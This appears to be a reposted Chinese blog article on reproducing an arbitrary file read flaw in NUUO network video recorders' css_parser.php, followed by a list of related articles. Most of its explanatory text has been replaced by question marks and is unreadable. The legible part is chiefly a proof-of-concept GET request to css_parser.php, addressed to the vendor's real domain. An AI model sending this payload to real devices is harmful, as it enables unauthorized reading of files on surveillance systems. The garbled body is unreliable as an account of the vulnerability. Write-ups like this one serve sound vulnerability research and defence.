NUUO网络视频录像机 css_parser.php 任意文件读取漏洞复现-白红宇

NUUO网络视频录像机 css_parser.php 任意文件读取漏洞复现

阅读量：804 次

发布时间：2023-02-17

本文共 764 字，大约阅读时间需要 2 分钟。

0x01 NUUO???????????

NUUO????????Network Video Recorder???NVR??NUUO Inc.???????????????????????????????????????????????????????IP????????????????????????????????????NUUO NVR??????????????????????????

0x02 ????

???????????????????css_parser.php???????????????????????????????????????????????????????????????????????????????????

0x03 ??????

????????????????

????????URL??GET?????????

GET /css_parser.php?css=css_parser.php HTTP/1.1

??????????????????User-Agent??????

Host: www.nuuo.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:xx.xx.xx) Gecko/20100101 Firefox/xx.xx

0x04 ????

?????????PoC?Proof of Concept?????????????

GET /css_parser.php?css=css_parser.php HTTP/1.1  Host: www.nuuo.com

??????????css_parser.php???????????????????????????????????????

转载地址：http://hwnfk.baihongyu.com/

你可能感兴趣的文章

PEPM Cookie 远程代码执行漏洞复现(XVE-2024-16919)

查看>>

Percona Server 5.6 安装TokuDB

查看>>

percona-xtrabackup 备份

Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password). 大数据ssh权限问题 hadoop起不来 hadoopssh错

查看>>

PermissionError:[Errno 13] 权限被拒绝:‘/manage.py‘

查看>>

Permutation

查看>>

PE文件,节头有感IMAGE_SECTION_HEADER

查看>>

PE知识复习之PE的导入表

查看>>

PGOS:今天动手给电脑装青苹果Win7 X64位系统

查看>>

PgSQL · 特性分析 · PG主备流复制机制

查看>>

phoenix连接hbase报错Can not resolve hadoop120, please check your network_记录026---大数据工作笔记0187

查看>>

PHP

查看>>

Regular Expression Notes

查看>>

PHP $FILES error码对应错误信息

查看>>

PHP $_FILES函数详解

查看>>

php & 和 &amp; （主要是url 问题）

查看>>

php -- 魔术方法之判断属性是否存在或为空：__isset()

查看>>

php -- 魔术方法之获取属性：__get()

查看>>